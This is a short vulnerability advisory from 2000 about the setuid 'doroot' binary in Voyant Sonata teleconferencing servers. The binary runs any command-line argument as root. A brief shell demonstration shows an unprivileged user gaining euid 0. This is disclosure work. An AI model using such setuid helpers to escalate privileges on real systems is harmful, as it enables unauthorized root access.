Title: Voyant Sonata doroot command vulnerability
Author: Larry W. Cashdollar, @_larry0
Download Site: http://www.voyanttechnology.com/
Vendor: Voyant Technologies.
Vendor Notified: 2000-11-30
Vendor Contact: firstname.lastname@example.org
Description: Sonata is a teleconfrencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge componet of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer.
The setuid binary doroot does exactly what it says. It executes its command line argument as root. This is really silly and I dont know why it would need to exist.
Export: JSON TEXT XML
$ cd /opt/TK/tk4.1/library/demos
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot